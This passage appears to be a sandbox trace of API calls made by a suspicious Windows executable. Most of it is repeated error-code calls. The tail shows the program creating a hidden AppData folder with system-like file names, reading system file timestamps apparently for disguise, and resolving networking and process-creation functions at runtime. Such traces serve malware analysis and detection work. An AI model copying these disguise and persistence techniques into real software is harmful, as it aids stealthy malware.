returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.689] SetLastError (dwErrCode=0x0) [0036.689] GetLastError () returned 0x0 [0036.690] SetLastError (dwErrCode=0x0) [0036.690] GetLastError () returned 0x0 [0036.690] SetLastError (dwErrCode=0x0) [0036.690] GetLastError () returned 0x0 [0036.690] SetLastError (dwErrCode=0x0) [0036.690] GetLastError () returned 0x0 [0036.690] SetLastError (dwErrCode=0x0) [0036.690] GetLastError () returned 0x0 [0036.690] SetLastError (dwErrCode=0x0) [0036.690] GetLastError () returned 0x0 [0036.690] SetLastError (dwErrCode=0x0) [0036.690] GetLastError () returned 0x0 [0036.690] SetLastError (dwErrCode=0x0) [0036.690] GetLastError () returned 0x0 [0036.690] SetLastError (dwErrCode=0x0) [0036.690] GetLastError () returned 0x0 [0036.690] SetLastError (dwErrCode=0x0) [0036.690] GetLastError () returned 0x0 [0036.690] SetLastError (dwErrCode=0x0) [0036.690] GetLastError () returned 0x0 [0036.696] SetLastError (dwErrCode=0x0) [0036.696] GetLastError () returned 0x0 [0036.696] SetLastError (dwErrCode=0x0) [0036.696] GetLastError () returned 0x0 [0036.696] SetLastError (dwErrCode=0x0) [0036.696] GetLastError () returned 0x0 [0036.696] SetLastError (dwErrCode=0x0) [0036.696] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.697] SetLastError (dwErrCode=0x0) [0036.697] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.698] GetLastError () returned 0x0 [0036.698] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.699] SetLastError (dwErrCode=0x0) [0036.699] GetLastError () returned 0x0 [0036.700] SetLastError (dwErrCode=0x0) [0036.700] GetLastError () returned 0x0 [0036.700] SetLastError (dwErrCode=0x0) [0036.700] GetLastError () returned 0x0 [0036.700] SetLastError (dwErrCode=0x0) [0036.700] GetLastError () returned 0x0 [0036.700] SetLastError (dwErrCode=0x0) [0036.700] GetLastError () returned 0x0 [0036.700] SetLastError (dwErrCode=0x0) [0036.700] GetLastError () returned 0x0 [0036.700] SetLastError (dwErrCode=0x0) [0036.700] GetLastError () returned 0x0 [0036.700] SetLastError (dwErrCode=0x0) [0036.700] GetLastError () returned 0x0 [0036.700] SetLastError (dwErrCode=0x0) [0036.700] GetLastError () returned 0x0 [0036.700] SetLastError (dwErrCode=0x0) [0036.700] GetLastError () returned 0x0 [0036.700] SetLastError (dwErrCode=0x0) [0036.700] GetLastError () returned 0x0 [0036.700] SetLastError (dwErrCode=0x0) [0036.700] GetLastError () returned 0x0 [0036.700] SetLastError (dwErrCode=0x0) [0036.700] GetLastError () returned 0x0 [0036.700] SetLastError (dwErrCode=0x0) [0036.700] GetLastError () returned 0x0 [0036.700] SetLastError (dwErrCode=0x0) [0036.700] GetLastError () returned 0x0 [0036.700] SetLastError (dwErrCode=0x0) [0036.700] GetLastError () returned 0x0 [0036.700] SetLastError (dwErrCode=0x0) [0036.700] GetLastError () returned 0x0 [0036.700] SetLastError (dwErrCode=0x0) [0036.701] GetLastError () returned 0x0 [0036.701] SetLastError (dwErrCode=0x0) [0036.701] GetLastError () returned 0x0 [0036.701] SetLastError (dwErrCode=0x0) [0036.701] GetLastError () returned 0x0 [0036.701] SetLastError (dwErrCode=0x0) [0036.701] GetLastError () returned 0x0 [0036.701] SetLastError (dwErrCode=0x0) [0036.701] GetLastError () returned 0x0 [0036.701] SetLastError (dwErrCode=0x0) [0036.701] GetLastError () returned 0x0 [0036.701] SetLastError (dwErrCode=0x0) [0036.701] GetLastError () returned 0x0 [0036.701] SetLastError (dwErrCode=0x0) [0036.701] GetLastError () returned 0x0 [0036.701] SetLastError (dwErrCode=0x0) [0036.701] GetLastError () returned 0x0 [0036.701] SetLastError (dwErrCode=0x0) [0036.701] GetLastError () returned 0x0 [0036.701] SetLastError (dwErrCode=0x0) [0036.701] GetLastError () returned 0x0 [0036.701] SetLastError (dwErrCode=0x0) [0036.701] GetLastError () returned 0x0 [0036.701] SetLastError (dwErrCode=0x0) [0036.701] GetLastError () returned 0x0 [0036.701] SetLastError (dwErrCode=0x0) [0036.701] GetLastError () returned 0x0 [0036.701] SetLastError (dwErrCode=0x0) [0036.701] GetLastError () returned 0x0 [0036.701] SetLastError (dwErrCode=0x0) [0036.701] GetLastError () returned 0x0 [0036.701] SetLastError (dwErrCode=0x0) [0036.701] GetLastError () returned 0x0 [0036.701] SetLastError (dwErrCode=0x0) [0036.701] GetLastError () returned 0x0 [0036.702] SetLastError (dwErrCode=0x0) [0036.702] GetLastError () returned 0x0 [0036.702] SetLastError (dwErrCode=0x0) [0036.702] GetLastError () returned 0x0 [0036.702] SetLastError (dwErrCode=0x0) [0036.702] GetLastError () returned 0x0 [0036.702] SetLastError (dwErrCode=0x0) [0036.702] GetLastError () returned 0x0 [0036.702] SetLastError (dwErrCode=0x0) [0036.702] GetLastError () returned 0x0 [0036.702] SetLastError (dwErrCode=0x0) [0036.702] GetLastError () returned 0x0 [0036.702] SetLastError (dwErrCode=0x0) [0036.702] GetLastError () returned 0x0 [0036.702] SetLastError (dwErrCode=0x0) [0036.702] GetLastError () returned 0x0 [0036.702] SetLastError (dwErrCode=0x0) [0036.702] GetLastError () returned 0x0 [0036.702] SetLastError (dwErrCode=0x0) [0036.702] GetLastError () returned 0x0 [0036.702] SetLastError (dwErrCode=0x0) [0036.702] GetLastError () returned 0x0 [0036.702] SetLastError (dwErrCode=0x0) [0036.702] GetLastError () returned 0x0 [0036.702] SetLastError (dwErrCode=0x0) [0036.702] GetLastError () returned 0x0 [0036.702] SetLastError (dwErrCode=0x0) [0036.702] GetLastError () returned 0x0 [0036.702] SetLastError (dwErrCode=0x0) [0036.702] GetLastError () returned 0x0 [0036.702] SetLastError (dwErrCode=0x0) [0036.702] GetLastError () returned 0x0 [0036.702] SetLastError (dwErrCode=0x0) [0036.702] GetLastError () returned 0x0 [0036.703] SetLastError (dwErrCode=0x0) [0036.703] GetLastError () returned 0x0 [0036.703] SetLastError (dwErrCode=0x0) [0036.703] GetLastError () returned 0x0 [0036.703] SetLastError (dwErrCode=0x0) [0036.703] GetLastError () returned 0x0 [0036.703] SetLastError (dwErrCode=0x0) [0036.703] GetLastError () returned 0x0 [0036.703] SetLastError (dwErrCode=0x0) [0036.703] GetLastError () returned 0x0 [0036.703] SetLastError (dwErrCode=0x0) [0036.703] GetLastError () returned 0x0 [0036.703] SetLastError (dwErrCode=0x0) [0036.703] GetLastError () returned 0x0 [0036.703] SetLastError (dwErrCode=0x0) [0036.703] GetLastError () returned 0x0 [0036.703] SetLastError (dwErrCode=0x0) [0036.703] GetLastError () returned 0x0 [0036.703] SetLastError (dwErrCode=0x0) [0036.703] GetLastError () returned 0x0 [0036.703] SetLastError (dwErrCode=0x0) [0036.703] GetLastError () returned 0x0 [0036.703] SetLastError (dwErrCode=0x0) [0036.703] GetLastError () returned 0x0 [0036.703] SetLastError (dwErrCode=0x0) [0036.703] GetLastError () returned 0x0 [0036.703] SetLastError (dwErrCode=0x0) [0036.703] GetLastError () returned 0x0 [0036.703] SetLastError (dwErrCode=0x0) [0036.703] GetLastError () returned 0x0 [0036.703] SetLastError (dwErrCode=0x0) [0036.703] GetLastError () returned 0x0 [0036.703] SetLastError (dwErrCode=0x0) [0036.703] GetLastError () returned 0x0 [0036.704] SetLastError (dwErrCode=0x0) [0036.704] GetLastError () returned 0x0 [0036.704] SetLastError (dwErrCode=0x0) [0036.704] GetLastError () returned 0x0 [0036.704] SetLastError (dwErrCode=0x0) [0036.704] GetLastError () returned 0x0 [0036.704] SetLastError (dwErrCode=0x0) [0036.704] GetLastError () returned 0x0 [0036.704] SetLastError (dwErrCode=0x0) [0036.704] GetLastError () returned 0x0 [0036.704] SetLastError (dwErrCode=0x0) [0036.704] GetLastError () returned 0x0 [0036.704] SetLastError (dwErrCode=0x0) [0036.704] GetLastError () returned 0x0 [0036.704] SetLastError (dwErrCode=0x0) [0036.704] GetLastError () returned 0x0 [0036.704] SetLastError (dwErrCode=0x0) [0036.704] GetLastError () returned 0x0 [0036.704] SetLastError (dwErrCode=0x0) [0036.704] GetLastError () returned 0x0 [0036.704] SetLastError (dwErrCode=0x0) [0036.704] GetLastError () returned 0x0 [0036.704] SetLastError (dwErrCode=0x0) [0036.704] GetLastError () returned 0x0 [0036.704] SetLastError (dwErrCode=0x0) [0036.704] GetLastError () returned 0x0 [0036.704] SetLastError (dwErrCode=0x0) [0036.704] GetLastError () returned 0x0 [0036.704] SetLastError (dwErrCode=0x0) [0036.704] GetLastError () returned 0x0 [0036.704] SetLastError (dwErrCode=0x0) [0036.704] GetLastError () returned 0x0 [0036.704] SetLastError (dwErrCode=0x0) [0036.704] GetLastError () returned 0x0 [0036.705] SetLastError (dwErrCode=0x0) [0036.705] GetLastError () returned 0x0 [0036.705] SetLastError (dwErrCode=0x0) [0036.705] GetLastError () returned 0x0 [0036.705] SetLastError (dwErrCode=0x0) [0036.705] GetLastError () returned 0x0 [0036.705] SetLastError (dwErrCode=0x0) [0036.705] GetLastError () returned 0x0 [0036.705] SetLastError (dwErrCode=0x0) [0036.705] GetLastError () returned 0x0 [0036.705] SetLastError (dwErrCode=0x0) [0036.705] GetLastError () returned 0x0 [0036.705] SetLastError (dwErrCode=0x0) [0036.705] GetLastError () returned 0x0 [0036.705] SetLastError (dwErrCode=0x0) [0036.705] GetLastError () returned 0x0 [0036.705] SetLastError (dwErrCode=0x0) [0036.705] GetLastError () returned 0x0 [0036.705] SetLastError (dwErrCode=0x0) [0036.705] GetLastError () returned 0x0 [0036.705] SetLastError (dwErrCode=0x0) [0036.705] GetLastError () returned 0x0 [0036.705] SetLastError (dwErrCode=0x0) [0036.705] GetLastError () returned 0x0 [0036.705] SetLastError (dwErrCode=0x0) [0036.705] GetLastError () returned 0x0 [0036.705] SetLastError (dwErrCode=0x0) [0036.705] GetLastError () returned 0x0 [0036.705] SetLastError (dwErrCode=0x0) [0036.705] GetLastError () returned 0x0 [0036.705] SetLastError (dwErrCode=0x0) [0036.705] GetLastError () returned 0x0 [0036.705] SetLastError (dwErrCode=0x0) [0036.705] GetLastError () returned 0x0 [0036.706] SetLastError (dwErrCode=0x0) [0036.706] GetLastError () returned 0x0 [0036.706] SetLastError (dwErrCode=0x0) [0036.706] GetLastError () returned 0x0 [0036.706] SetLastError (dwErrCode=0x0) [0036.706] GetLastError () returned 0x0 [0036.706] SetLastError (dwErrCode=0x0) [0036.706] GetLastError () returned 0x0 [0036.706] SetLastError (dwErrCode=0x0) [0036.706] GetLastError () returned 0x0 [0036.706] SetLastError (dwErrCode=0x0) [0036.706] GetLastError () returned 0x0 [0036.706] SetLastError (dwErrCode=0x0) [0036.706] GetLastError () returned 0x0 [0036.706] SetLastError (dwErrCode=0x0) [0036.706] GetLastError () returned 0x0 [0036.706] SetLastError (dwErrCode=0x0) [0036.706] GetLastError () returned 0x0 [0036.706] SetLastError (dwErrCode=0x0) [0036.706] GetLastError () returned 0x0 [0036.706] SetLastError (dwErrCode=0x0) [0036.706] GetLastError () returned 0x0 [0036.706] SetLastError (dwErrCode=0x0) [0036.706] GetLastError () returned 0x0 [0036.706] SetLastError (dwErrCode=0x0) [0036.706] GetLastError () returned 0x0 [0036.706] SetLastError (dwErrCode=0x0) [0036.706] GetLastError () returned 0x0 [0036.707] SetLastError (dwErrCode=0x0) [0036.707] GetLastError () returned 0x0 [0036.707] SetLastError (dwErrCode=0x0) [0036.707] GetLastError () returned 0x0 [0036.707] SetLastError (dwErrCode=0x0) [0036.707] GetLastError () returned 0x0 [0036.707] SetLastError (dwErrCode=0x0) [0036.707] GetLastError () returned 0x0 [0036.707] SetLastError (dwErrCode=0x0) [0036.707] GetLastError () returned 0x0 [0036.707] SetLastError (dwErrCode=0x0) [0036.707] GetLastError () returned 0x0 [0036.707] SetLastError (dwErrCode=0x0) [0036.707] GetLastError () returned 0x0 [0036.707] SetLastError (dwErrCode=0x0) [0036.707] GetLastError () returned 0x0 [0036.707] SetLastError (dwErrCode=0x0) [0036.708] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0036.708] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0036.708] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0036.708] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef7b8 | out: lpSystemTimeAsFileTime=0x2ef7b8*(dwLowDateTime=0xe3918bd0, dwHighDateTime=0x1d3dfba)) [0036.709] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2ef6f0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.709] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2ef5d8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.709] GetLastError () returned 0x0 [0036.709] GetLastError () returned 0x0 [0036.709] GetLastError () returned 0x0 [0036.709] GetLastError () returned 0x0 [0036.709] GetLastError () returned 0x0 [0036.709] GetLastError () returned 0x0 [0036.709] GetLastError () returned 0x0 [0036.709] GetLastError () returned 0x0 [0036.709] GetLastError () returned 0x0 [0036.709] GetLastError () returned 0x0 [0036.709] GetLastError () returned 0x0 [0036.709] GetLastError () returned 0x0 [0036.709] GetLastError () returned 0x0 [0036.709] GetLastError () returned 0x0 [0036.709] GetLastError () returned 0x0 [0036.709] GetLastError () returned 0x0 [0036.709] GetLastError () returned 0x0 [0036.709] GetLastError () returned 0x0 [0036.709] GetLastError () returned 0x0 [0036.709] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0036.709] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0036.709] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.709] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.709] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.709] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0036.709] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0036.709] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0036.710] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0036.710] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0036.710] GetLastError () returned 0xb7 [0036.710] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0036.710] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0036.710] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0036.710] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0036.710] wsprintfA (in: param_1=0x2ef458, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0036.710] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0036.710] wsprintfA (in: param_1=0x2ef354, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0036.710] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0036.710] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0036.710] CloseHandle (hObject=0x74) returned 1 [0036.710] GetLastError () returned 0x0 [0036.710] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0036.710] GetLastError () returned 0x0 [0036.710] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0036.711] GetSystemDirectoryA (in: lpBuffer=0x2ef458, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0036.711] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0036.711] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0036.711] CloseHandle (hObject=0x74) returned 1 [0036.711] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0036.711] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0036.711] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0036.712] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0036.712] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0036.712] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0036.712] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0036.712] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0036.713] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0036.713] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0036.713] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0036.713] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0036.713] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0036.713] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0036.713] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0036.713] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0036.713] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0036.713] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0036.713] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0036.713] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0036.713] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0036.713] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0036.713] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0036.713] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0036.713] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0036.713] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0036.713] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0036.713] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0036.713] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0036.714] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0036.714] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0036.714] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0036.714] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0036.714] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0036.714] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0036.714] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0036.714] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0036.714] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0036.714] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0036.714] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0036.714] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0036.714] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c 